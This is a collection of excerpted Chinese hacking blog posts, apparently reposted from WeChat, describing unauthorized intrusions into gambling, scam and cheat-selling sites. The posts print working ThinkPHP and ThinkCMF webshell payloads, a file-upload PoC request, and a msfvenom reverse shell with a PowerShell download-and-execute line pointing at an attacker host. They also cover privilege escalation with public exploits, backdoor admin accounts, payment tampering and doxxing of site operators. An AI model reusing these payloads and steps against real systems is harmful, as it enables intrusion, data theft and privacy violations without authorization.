红队攻击面相关讨论

某天挖 edu 挖到自闭，然后想着 fofa 一下，看看有没有什么好玩的站点 好家伙，居然还真有这种商城，原谅我孤陋寡闻了。于是乎，想进去学习了一下 首先，进行了一下初步的信息收集 基本上都是伪静态的，没有什么发现可以明显判断其网站后端语言的地方在搜索框点击搜索后 可以发现这个地址并不能帮助我们判断该站的类型但也要尝试一下SQL注入 然后直接被 Ban IP了，索性放弃对这个地方的继续研究，继续翻找其他功能点。当我们点击订单查询时 可以发现Url 产生了变化 跳转到了登录注册页面，既然来都来了，注册一个看看有没有其他业务，黑不走空，哈哈哈 昵称处尝试打 Xss，发现也会被 Ban IP，那就先放一下，找找有没有什么业务逻辑漏洞吧。尝试购买一些商品，之前一直听说支付漏洞，但弟弟从没有真正遇到过，碰碰运气吧 点击购买，抓包发现 cookie 中出现了一个奇怪的参数 我们拿去urldecode 一下，看看是什么东西 那就猜测一下，可以看到前面应该是价格，后面是购买的个数，我们先改一下 编码回去，覆盖发包 因为在 cookie 里，所以传过去的每个数据中的 cookie 都要改 可以发现，我们的单价变为了 1，数量为 10，总额变为了 10，记录一下参数之间对应的关系 提交订单，修改cookie内的值，然后继续，页面跳转到了支付宝付款页面 点开支付宝，发现价格的确发生改变 没错，75元的商品，只需要17元即可支付，但是商家发不发货就不晓得了 意外惊喜 然后，我…

初遇难题发现一个bQc站先尝试打一下主站先尝试目录扫描看能不能发现一些后台之类的，这里我用的是dirsearch。但是很遗憾，没有什么有价值的目录，连后台也扫不出来，但是这是在意料之中，毕竟大部分菠菜网站防护都做的挺好的。接下里尝试注册一个账号看看尝试注入，发现加密，不会逆向的我只能暂时放弃。注册成功后发现一个上传接口上传成功但是查看后发现他是以id的形式存储，无法形成上传漏洞放弃。这个网站拿不下来转换思路尝试对整个ip进行渗透，首先要对这个ip的全端口进行扫描，尽量获取到比较全的信息。获得了两个web页面。rocketmq，这个有最新版漏洞爆出来尝试找到工具尝试攻击，但是失败不能执行命令。还有另外一个登录界面发现存在shiro框架尝试爆破但是未发现秘钥。柳暗花明突破点：他有一个8888端口，访问都会跳转非法ip看了一下burp发现他会访问登录页面再进行跳转眉头一皱发现事情并不简单，在ip后随便加了一点，导致其报错，发现其使用的是spring框架。Actuator 是 Spring Boot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。Actuator 的核心是端点 Endpoint，它用来监视应用程序及交互，spring-boot-actuator 中已经内置了非常多的 Endpoint（health、info、beans、metrics、httptrace、shutdown等等），同时也允许我们自己扩展自己的 Endpoints。每个 Endp…

前言在一个风和日丽的下午，我们正在Blank的带领下，兴致勃勃地讨论着，女人。 而float先生发现了一个访问了他博客的奇怪IP。 哎，根本不把什么网络安全法放在眼里，直接就开打。 Game Start浏览器访问会直接跳登陆界面。 信息收集路径上敲个X。拿到ThinkPHP和版本号。 同时，float先生nmap扫到801端口，并确定是宝塔建站。不过这里没有进一步研究。 RCE尝试5.0.21能直接RCE，且payload满天飞。不过依然遇到了一点小坑。 模块名不是通常的index，而且必须存在。根据跳转登录的uri： /admin/login/index.html 猜测module为admin，果然成功。 disable_functions赫然在列，则rce果然不成功。 种马好消息是写文件成功了。 访问shell.php，看到phpinfo界面。 反手就写冰蝎马连它。 趁机瞅了瞅，贷款、经理、业务员、bc...好，继续打。 连接数据库硬编码还真是宇宙难题，数据库密码到手。 第一次遇到MySQL的密码里有@，直接写会破坏连接串。如： mysql://root:[email protected]:3306/mysql password中的@会提前走到ip:端口的判断。需要把它编码为%40 管理员登录翻web目录和代码实在没有进展了，尝试登录一下系统。 数据库里有账号口令，当然口令是加盐的哈希。 谁家好人头铁非要暴密码出来，直接patch下login代码，不查表就完事了。 登录系统。 这业…

从某个大哥手里拿到一个菠菜得day，是一个任意文件上传得0day，通过任意文件上传获取到webshell，但是扫描端口能看到开启了宝塔。 然后就出现了下面的问题。 使用哥斯拉的bypass插件可以执行命令。 用户为WWW，宝塔的默认用户，接下来就是常规操作，提权、SSH登陆拿宝塔。 先进行提权，上传脏牛然后看能够使用的提权exp。 运行之后使用CVE-2021-4034进行提权，先把EXP文件上传到菠菜服务器。 反弹shell，然后进入exp文件夹编译运行即可获取到root权限。 获取到root权限之后就办事了，创建账户、赋权限即可。反弹的shell因为vim不了，然后就把他passwd文件保存在本地然后第三列给0，这样子登陆在之后就是root。 创建的账户是ftpp，然后保存为passwd文件上传到web目录，使用提权后的root权限先删除passwd然后在copy过去即可。 因为这个服务器有宝塔控制面板，所以先进入/www/server/panel/data,这个文件夹里面有一个default.db文件，这个是宝塔的配置数据文件。保存在本地之后修改他的宝塔密码，登陆即可。然后在结束之后记得把db数据文件还原回去，这样他的密码还是原来的密码。 然后修改密码登陆即可。 通过登陆可以看到站点的完整信息，还有数据库密码，web目录，还有他的手机号，但是手机号只有前三后四，中间四位是*号，之前查手机号的办法也没用了，其实打到这里就可以，交给警察叔叔抓人就可以了。 转自于原文链接： https://mp.…

前言本文仅用于交流学习， 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 渗透测试可分为三个阶段 信息收集 尽可能的收集所有关的资产信息确定测试范围 漏洞发现 针对收集的资产进行进一步的漏洞检测 漏洞利用 针对发现的漏洞进行进一步的利用以及利用的程度 1.js中的api接口 2.多端口形站点3.客服系统钓鱼引导等4.积分系统针对脆弱的旁站5.充值接口6.找源代码分析某演示站泄露的源码白盒分析 7.bc后台根于js资源url,子域,等多种方式找一般小站大多是自域前加 ad ag admin 123admin ht等等 转载于原文链接： https://mp.weixin.qq.com/s/ZGNKIkfOidLPpjT856LHxw

0x01 漏洞描述 网络dubo是指通过互联网手段（非法dubo网站、菠菜App、微信群等）进行的赌博活动。由于网络dubo不合法，资金不受法律保护，有很多“出老千”的行为，很多人被骗后往往不敢报警，导致家破人亡，所以打击dubo，刻不容缓。某菠菜系统系统存在任意文件上传漏洞，攻击者通过漏洞可以上传木马文件，导致服务器失陷。 0x02 漏洞复现 fofa：body="main.e5ee9b2df05fc2d310734b11cc8c911e.css" 1.执行POC，上传冰蝎马，返回上传路径 POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documen…

逛QQ空间刷到了 于是有了下文。打开站点，很贴心，前台后台都可以进。 下面说漏洞点 sql注入，有一套程序基于某个模板二开，正好我手里有这套模板且审计过。所以轻松拿下。 无任何过滤，直接注即可。 任意文件上传 这个我怀疑是开发自己留的后门。 看得懂的人一眼就看出来了。直接本地新建表单提交即可。 但是目标站有个问题，上传不回显路径，应该是注释了echo。本地搭建测试， 上传文件名修改为这个格式。 思路：本地复现upload，然后和远程同时提交，同一个时间点，返回的文件名应该是一样的。 测试: 复现成功。 点到为止。 另求教各位精通php审计的大佬 这段代码可否有利用点。 尝试各种截断始终无法执行php代码。 转载于原文链接： https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ

一、案例1因为最近吃鸡被外挂打自闭了，所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台 你们这些卖挂的，等我有空了一个一个捶。 发现大多数都是用的一套aspx的程序，可惜没有源码不能白盒审计，黑盒也找不到什么洞 只能找找软柿子捏，昨天晚上一口气锤了四个 基本上都有宝塔 不过php-venom 4 系列加上配套的编码器过宝塔稳得一批 脱了裤子发现里面4000+数据 今天晚上又锤了一个吃鸡外挂站 可惜尴尬的是没有写入权限 写篇大水文记录一下 1. 无套路进后台 这个应该算是那种推广站，里面什么都没有，只有宣传内容 管你是什么，照锤不误。 看了一下是织梦二次开发的站 后台很容易进，这里大家都明白什么意思。 2.玄学后台发现后台删了很多功能，特别是织梦的坑货文件管理器 但是从经验上来说很多这种二次开发的并不是真的把编辑器删掉了，只是在后台页面不显示了。 审查元素启动 随便找个链接改一下，替换成media_main.php?dopost=filemanager 然后点击，果然找到了文件管理器页面 上传shell 本来以为就这样结束了 结果发现虽然提示上传成功但是啥都没有 还以为是waf，就换了人畜无害的一张jpg上去也是啥都没有 以为是目录权限问题 找到session的临时文件，上传，照样不行 图就不放了，总之就是传不上去 觉得可能是整站没写权限 随手试试删除功能，发现可以删文件 emmmmm，所以到底是有权限没有呢 一般来说没写权限的话也就没有修改权限，也就是没有删除权限 想着…

我们找到一个带有有漏洞的QP后台框架的后台 这个框架有很多的漏洞，比如用户遍历，我们如果输入一个存在的用户，密码错误时，就会提示用户或密码错误，如果我们输入一个不存在的用户，就会提示用户不存在 除此之外，网站还会存在SQL注入漏洞，我们只需要抓一个提交账号密码的POST包 粘贴好一个txt文档然后丢进sqlmap， 是mssql，我们可以开启xp_cmdshell，这里我们打算写入webshell，所以先os-shell判断出路径（超级慢） 然后利用xp_cmdshell写入webshell 成功上线 然后我打算上线cs进行下一步操作，尝试了web传递，但是被杀软拦住了 很烦，没办法，只能尝试免杀上线，这里我用的免杀方法是分离免杀 生成payload，然后写一个shellloader并且base64编译一下 我把shellcode放到了vps上 把shellloader上传到目标 一，二，三上线！ 没错，低权用户，多次尝试提权都不成功，最后还是sweetpotato拿下了 拿到了我最爱的system 添加用户 net user admin$ admin@123 /add添加到管理员组 net localgroup administrators test /add直接3389连接 拿到远程桌面本来打算fscan扫一下的，但是发现内网的ip和平常不一样，扫了一下发现出现很多主机，于是判断这是一个vps，故渗透到此为止。 转载于原文链接： https://mp.weixin.qq.co…

0X00 歪打正着 无意间碰到一套垃圾菠菜网站杀猪盘 挨个访问能扫描出来的目录与文件发现并没有太大作用，不过发现了后台地址。phpmyadmin访问500。 访问xd.php到后台访问发现还需要授权验证码 试了下8888，123456之类的都提示错误，当场关闭。 尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。返回首页发现url有点不常见。 0X01 寻找同类型网站以及源码这种搞诈骗的很少会开发肯定源码是从网上下载找人搭建的，不常见就是特征，于是搜索了下。 0X02 开始审计这么多网站那源码肯定烂大街了，于是花了点时间找到了源码，尝试审计。 下载回来源码用seay扫描下，源码又太大我也懒得去本地搭建，直接用源码对着目标进行怼。 从中发现了个fileupload.php文件好像有点问题。 访问目标发现也存在该文件。把该文件提取出来到本地搭建的环境中做测试。 直接访问会自动创建出upload和upload_tmp两个文件夹，这玩意是个demo这个点其实看起来更像个后门。 并且filename变量完全是可控的。 继续往下看发现一些判断，可以表单上传名就为file。文件上传 其他的就不用管了，直接改个上传表单。只要加上参数name和file就行了。 name参数控制上传文件名为aaa.php 选择1.jpg上传 上传后没有返回路径但是在upload下已经存在aaa.php文件。 SQL注入 变量中where的值又是来自request中，并且上面的checkinput中也没有检测type的…

0x00 前言打开链接，发现是一个luo聊的app下载，夜神+burp抓包 获取到网址，通过js的文件特征去github查找源码文件根据代码发现他是一个kjcms，然后去官网下载源码来进行审计0x01 sql注入在cls_weixin::on_exe方法中，有许多执行sql语句的点这里注入需要满足$arr_msg[‘FromUserName’]可控，发现$arr_msg变量调用了当前类的get_msg()方法，跟进这个方法：static function get_msg() { $arr_return = array(); $cont = file_get_contents("php://input"); //$cont = file_get_contents(KJ_DIR_ROOT . "/test.txt"); if(empty($cont)) return $arr_return; $request = simplexml_load_string($cont , 'SimpleXmlElement' , LIBXML_NOCDATA); $arr_return = fun_format::toarray($request); return $arr_return;}发现$cont是通过post数据流获取的，传入的xml，继续跟进fun_format::toarraystatic function toarray($cont) { if(gettype($cont) == "strin…

最近偶然发现一个虚拟货币买涨跌的杀猪盘，遂进行了一波测试，前台长这样。 为thinkphp5.0.5随用RCE进行打入，成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7)) 查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数，且com和dl加载都不能用无法执行相应的系统命令如下所示： assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open //php如上系统命令都已禁用 但有文件的读写权限没有禁用assert()，file_put_contents()等函数，查看后发现为windows系统如下所示： 由于php执行系统命令的函数都被禁用了，从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波，发现其管理员cookie固定且可以伪造如下所示看着像后门： 故可后台登录绕过，管理员cookie固定，添加cookie字段即可登录绕过。浏览器f12，在cookie中添加上述键值访问index，即可成功后台登录如下所示好多钱(被骗的人好多)： 前台询问客…

0x00 前言随着菠菜类违法站点的肆虐，让无数人妻离子散。为此，献上一份微薄之力，希望能给“有关部门”提供一些帮助。今天给大家表演的是收割BC天恒盛达。 0x01 程序介绍程序采用PHP5.4 + MySQL 程序结构如下 基本上目前做此类违法站点的不法分子，除了外包以外就是天恒、大发几套程序模改的。暂时，这边由于技术水平上面的问题，只能够发出天恒的。版本可能有点老。但是，一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测，大约70%的存在这些问题，而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。 0x02 漏洞详情1、money - SQL注入 web\wjaction\default\PayOnlineBack.class.php 继续跟进money，此处为GET获取，接着看条件 条件展示，第一个为Key验证，这个在配置文件里。如果Key错误则表示所有订单都无法生效。也就是说Key肯定是在URL请求内，这个验证即可绕过。 继续看条件，这里是生成一个MD5值进行校验。但是这种校验是有缺陷的，此处并未把key的值带入进去。所以我们直接提交的时候，把$tno.$payno.$money都设为空。那么我们将获取$md5key的MD5值。因为$sign在URL中能展示出来。解密后，我们再按照他的验证机制就可以写脚本，进行注入了。 往下继续看，交易号随机来就行了。 继续看，最后一个验证。这里的用户名肯定是真实的，所以这里的验证就算是废掉了 接下来，根据前面的分析，就可…

0x00 概述 某天，一位网上朋友告诉笔者，他被骗了。被骗方式很独特，因为自己没钱所以选择贷款，在贷款过程中惨遭诈骗。 诈骗短信： 0x01诈骗过程 （此处受害者用小辉代替） 某日，小辉手机收到一条关于网络贷款的短信，恰逢月底，捉襟见肘，小辉没忍住诱惑下载打开了app。注册好账号，填写好身份证号、手持、工作地点、家人信息等后申请了20000元贷款，但是迟迟没到账，小辉询问客服得知：亲，这边申请贷款需要先缴纳688的VIP费用哦，缴纳后VIP费用会连同贷款金额一起打款到您的银行卡账户。小辉想了想，也不亏，于是将下个月房租开通了VIP待遇。 小辉开通了VIP待遇，以为就能顺利贷款度过月底，但是还是没收到贷款金额以及VIP费用。这次客服主动联系小辉，"您的信用额度不够，需要再刷流水3500元，请缴纳现金证明还款能力，缴纳后费用会连同贷款金额一起打款到您的银行卡账户"。 小辉急了，眼看着下个月房租没着落了，咬咬牙找朋友借了3500元再次打给客服提供的银行卡号，心想，这次你总没什么借口了吧！20000块钱，拿来吧你！小辉已经想好贷款下来两万块如何吃喝玩乐了～～～ 可是幸运女神还是没有照顾小辉，客服再次联系小辉，称已经审批成功即将下款，但是还需要支付3000的工本费用，且费用会连同贷款金额一起打款到银行卡账户，小辉傻眼了，紧接着，客服将后台生成的虚假的合同发送给了小辉。 小辉急了，自己就贷个款而已，却损失了几千块钱还要上征信，关键贷款的钱还没到手！小辉眼看着事情越闹越大，找到了我，经过小辉的一番描述…

一、目录结构 首先我们先看一下结构，system文件夹下有相关代码。我直接给大家看一下漏洞吧。 二、审计出洞1、购物车异步获取信息 - SQL注入 system\modules\member\cart.action.php 虽然本身是过滤单引号但是在这里并没有用单引号保护起来所以这里是一个注入，并且没有验证用户身份，从站外未登陆的情况下即可进行注入。 直接官网哈哈哈哈！！！！ 2、BOM插件 - 目录遍历 system/plugin/bom/bom.plugin.php 直接访问即可，后台即便是改了也没什么事情，照样刚！ 3、我的晒单 - 存储型XSS（可打到管理员Cookie） 由于这套CMS出来的较早了，在此之前被许多小黑挖掘过XSS漏洞，但是....我这个XSS貌似也是0day 哈哈哈需要晒单功能这里给大家演示一下先走一遍流程 添加晒图 把图片地址改成我们的XSS语句 fileurl_tmp参数 这时候便把IMG标签闭合了弹出了1 （触发在后台管理的“晒单查看”） 4、上传配置 - 后台Getshell 可能有些人看到后台有上传的地方，其实这些个上传是没有办法利用的。虽然你可以在后台改格式白名单但是依旧提不下。这时候呢....插马呗！！~~ 由于他过滤单引号所以这里就不带上单引号了。 允许上传类型处，写上pyload 提交完就完事了~~ 通过copy函数远程写个马就完事了 5、后台验证码存在缺陷 默认账户admin 这一串MD5值就是对应的验证码的值，此…

在鹰图中找TSRC资产准备挖腾讯SRC时候看到此站点域名:qq.com.xxxx.top,标题为登录第一感觉不是正经站应该是钓鱼站whois查询到的webpack打包的这种站点基本都会有一些测试账号,试了试18888888888密码123456看到这个基本确定这就是个做任务赚佣金的那种,主打的就是一个骗钱F12翻找请求和js找到,加载的资源文件报错, 用的thinkphp但是没洞,真是IP也有了找到后台伪装的挺好的叫xxx打卡系统 通过fofa查ip找到其他资产,ip访问发下是一个企业建站模版页面,ip后面加个admin跳到企业建站后台实话这个真烂在ip后面家入/x又是thinkphp5.0.5的笑死,验证存在rce那个做任务赚佣金的站点还没有好好测简单收集信息,找到旁站进去了基本上数据库配置都在data 或者configmd5解密管理员密码,进后台看看其他信息不怎么关注,主要找站点管理员 1.敏感手机号通过推荐人号很频繁就是一个手机号,139xxxx2.管理员登录日志分析:可疑ip定位在四川3.通过手机号查到微信,和支付宝查到这个人4.通过社工库查到此人QQ,微博以及本人照片 转载于原文链接： https://mp.weixin.qq.com/s/9M0HEP1x-5Xt1JQeyVDrGA

0x01 thinkadmin历史漏洞复习已经找到对方的app的后台地址是thinkadmin，因此我们需要去复习thinkadmin的历史漏洞。 CVE-2020-25540 https://github.com/zoujingli/ThinkAdmin/issues/244 利用POC如下 https://github.com/Schira4396/CVE-2020-25540 列目录 POST /?s=admin/api.Update/noderules=["runtime/"]文件读取 /?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b其本质大概想设计出来一个能让第三方去对比服务器上的系统web文件的功能，结果因为目录穿越造成任意目录读取。虽然有一定限制，但危害还是非常非常大，因此后续更新直接将这个功能下架。 还有一个没有CVE的反序列化漏洞 https://github.com/zoujingli/ThinkAdmin/issues/238 存在两处接口，其中一处正是上面列目录功能的rules传参。 POST /?s=admin/api.Update/noderules=payload另外一处则是 POST /?s=wechat/api.Push/indexreceive=payload 0x02 第一份源码因为官方已经不提供旧版源码下载，所以我第一时间去其他地方找到了一份使用thinkphp5.1…

一个学长前几天不幸在钓鱼网站中招被骗走一些资金，在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动 在对网站进行初步信息收集后发现网站使用ThinkPHP 5.0.7框架，直接找到ThinkPHP对应版本的Exp进行尝试： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=1 //执行phpinfo 成功弹出phpinfo，ThinkPHP的RCE漏洞没有修复，并且通过phpinfo可以看出服务器使用宝塔搭建，运行Windows系统，本想着接下来的事情就非常简单了，但是当我写Shell时遇到了困难： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ye.php&vars[1][]=<?php eval($_POST['cmd']);?> 文件被成功写入，但是却直接输出在了页面中，查看源代码发现< >被转义为了HTML实体编码： 在尝试利用base64编码后再写入，发现依然被转义，直接命令执行试一试： http://www.hu*****.***/index.php?s=/ind…

一、APP抓包和逆向破解加密算法打开APP是一个登录框 抓包后发现参数被加密了 使用Jadx脱源码发现，并没有加壳也没有混淆，运气很好 根据经验，先搜索Encrypt、Decrypt等关键字，发现在Common.js中有一个encryptData函数 定位过去，一套加解密算法都写好了放在这 放到浏览器console里面调试，果然没错 二、寻找注入点首先测试了一下注入 明文：{"userName":"TEST'","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"} 密文：QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUFDbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWv…

0x00 前言红蓝对抗无疑是一场持续性的博弈过程，随着近几年的攻防不断，打了一轮又一轮，web漏洞的急剧减少，社工钓鱼显然成为了主流的攻击手段之一。 0x01 免责声明请您务必认真阅读、充分理解下列条款内容： 1、本公众号分享的任何文章仅面向合法授权的企业安全建设行为与个人学习行为，严禁任何组织或个人用于非法活动。 2、在使用本文相关工具及技术进行测试时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。 3、如果您在使用本文相关工具及技术的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。 4、严禁任何组织或个人使用本公众号的名义进行非法盈利。 5、本公众号的所有分享工具及技术文章，严禁不经过授权的公开分享。 如果发现上述禁止行为，我们将保留追究您法律责任的权利，并由您自身承担由禁止行为造成的任何后果。 0x02 常规操作走一遍拿到靶标后 --> 资产收集 --> 找软柿子 --> 尝试打点 拿到靶标单位信息后，通过企查查查域名和企业架构，发现没有对外投资，只有一个上级单位总公司 找子域，也没啥可用资产（virustotal.com，快速简便但不准确） 通过qaxnb资产绘测平台来看看是否有可用信息，也是空空如也 通过多点Ping，域名解析等操作来找真实IP，发现都是指向阿里云 一套流程下来，除了一个打不动的官网（域名解析指向云，更没心情去深入挖掘了），没有任何可以打点的目标了 最终得出结论：软柿子竟是我自己 0x03 条条大路通罗马web打不动，就不能走常…

一、 起因近年来国内发生各种非法菠菜赌博案例非常之多，本次我就来讲解一下我是如何渗透下一个非法菠菜的网站的。本次渗透纯粹是运气+站长疏忽，可谓是千年堤坝毁于蚂巢之说。为了保证读者的理解，特采用入侵者的身份来纪实！ 二、踩点及收集信息打开目标站，发现是一个菠菜网站，然后开始收集信息了 域名的whois信息查询得知域名来自西部数码 这里我使用站长之家的ping工具是为了看有没有使用CDN及查询服务器机房位置。从whois结果得知使用的是dnspod的dns，但是有过经历的都是知道，一般的大型的IDC厂商，都是有自己的dns，代理才会使用dnspod 很明显，这个域名在代理上注册的，本来准备社工域名，但是没什么意义，别人解析回来了还是一样的使用，之前F4ther写过一篇文章是说做了个蜜罐钓鱼劫持了安全脉搏。但是太麻烦，还是直接略过，直接渗透吧。 我看到URL后面是Home/Change/AlipayInfo/alipay/微信.html，我第一预感就是使用ThinkPHP框架来写的程序。 为了验证我的猜想，我特地随便输入地址看他报错，一般的ThinkPHP报错都会显示出版本+物理路，其结果，有图上踩点可以得到以下信息 1. 此站使用的是ThinkPHP3.2.2的框架。 2. 物理路劲C:\WWW\pcdd\pc 3. 此网站没有使用CDN 4. 此网站服务器在境外（加拿大）。 5. 此网站必有漏洞。 三、 开始战斗随便找了一处直接sqlmap测试，结果如下图，有防护，直接被墙，导致无法继续，连接一个VPN 再看看，不行想办…

在一个风和日丽的晚上,正兴奋逛Twitter的我,忽然发现下面推荐关注有这么一个xxxx视频的名片。 这这这这，我可是正经人，不知道Twitter为啥会给我推送这些。这必须盘他,打开推广链接，辣眼睛，下载该app。 这app一打开就给人一股熟悉的味道，一看感觉很有可能是tp二开的。 注册手机号fiddler抓包改包，其实内容更辣眼睛 抓包获取url发现这不就是thinkcmf吗?满脸淫笑的想这还不拿下，前台那么多rce，就算有狗也能秒之,然而很快被现实打脸。 命令执行POC: payload1： /index.php?g=api&m=Oauth&a=fetch&content=<php>file_put_contents('pass.php','<?php @eval($_POST[1]); ?>')</php> payload2： /?a=fetch&;templateFile=public/index&prefix=''&content=<php>file_put_contents('pass.php','<?php @eval($_POST[1]); ?>')</php> payload3： ?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b…

拿到目标站这个页面 还没开始就已经准备放弃 然后咱看右上角有个积分商城,心如死灰的我点进去 看到这个页面直接摔门出去抽烟十分钟[别问为什么一问就是之前没搞成 开始信息收集吧 拿到这个积分商城把域名放进fofa 得到真实ip以后找到了宝塔后台登录面板 然后用域名/ip对目录进行扫描[御剑超大字典那款]看着语言栏勾选啊，还不知道啥脚本语言域名后面直接跟上index.php[有页面]、index.jsp[404]、index.asp[404]好嘞勾上php得到后台 像这样的页面源码很少的就碰运气找特征来试 在fofa中搜索 很多页面都是显示onethink,然后放百度搜一下 确定了是这个框架并且是基于thinkphp开发的[这里有个思路:当我们用tp框架漏洞去打的时候如果不成功,那么我们就可以利用找到的cms进行代码审计,基于我们上面已经找到了宝塔登录面板那么我们可以审计任意文件读取得到宝塔用户名密码,计划任务getshell]利用tp漏洞扫描工具获得POC debug报错出来是tp5.0.1搜了一下找到了日志路径尝试利用日志包含一直没成功后来发现他的日志到了一定的数量就会清空且phpinfo页面会占有一定的kb所以要通过burp让他的日志清空再进行包含把url编码抓包给转换成<?php phpinfo();?> //具体原因见[漏洞汇总 文件包含] 发送send时日志文件在burp里面没显示完马上就没有了此时再回头看最初POC当POC成功的时候下面会有debug信息 所以我们把注意力放在Raw当执行成功时会…

前言 喜欢看电影但又喜欢白嫖,所以经常在一些影视站点观看,偶尔会弹出一些色懒广告,最近公众号也没怎么更新就顺手找到一个色懒约P的广告试试由于尺度比较大打码比较严重简单总结色懒视频---引用外部x站的播放源 2.选X----后台都是城市和百度的照片乱七八糟的介绍,假的 3.预约---菠菜游戏,通过诱导方式引导下注 看到这是不是心动了,在放一张后台的数据实战经过 通过域名查ip找到找了后台,xx娱乐,扶墙找了一波源码,找到了类似源码以及搭建教程泄露了站点的ip一般的站点演示都附带了演示账号密码后台以及各种指纹特征 通过演示站点的指纹和默认账号密码找到一批同类型的站点,基本都是通过色懒视频约p噱头引导玩菠菜 后台开奖预设,都是骗局,希望看到这里可以分享此篇文章给你的色懒朋友 前期是通过找源码找演示站找指纹的方式搞进去的,还有一些站点,就是正常的渗透方式 首先注册账号 看到提示用户名可以自定义直接顺带上xss代码,比较鸡肋,后台很难触发 后台用户展示是这样,管理点击用户详细信息才会触发 还有就是基本上都是养鱼式引导,小额提现,大额各种阻挠 最后统计3k多人小台 找到管理员大概位置 转载于原文链接： https://mp.weixin.qq.com/s/IIyt-m1ul0UPXvocmwCfag

0x00 前言 闲着无聊，网上随便找了一个菠菜进行简单测试，并做笔记记录，大佬们轻喷，有什么不足之处请指教。 0x01 弱口令访问网站就是一个登录页面，没有验证码直接bp开启，成功爆出弱口令admin/123456，直接进入后台。 0x02 注入拿下权限翻看了很多功能点，在一处功能点发现上传接口，并尝试上传文件，发现无法上传，加了白名单。直接选择放弃，继续寻找。在某一个http://url/GroupMember.aspx?gid= 参数上加上单引号，直接报错，SQL注入这不就来了么。 说干就干，直接SQLMAP。 发现为MSSQL，且DBA权限，直接--os-shell 上线MSF 已经获取普通权限，接下来就是上线msf提权。msf生成powershell脚本，并放置在网站目录下。 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1 Vps开启监听 使用powershell上线session powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))" 如果想要通过url拼接堆叠执行powershell会存在一个问题，就是单引号闭合问题。我们可以通过对powershell进行编码一下，这样就可以绕过单引号的问题。下面推…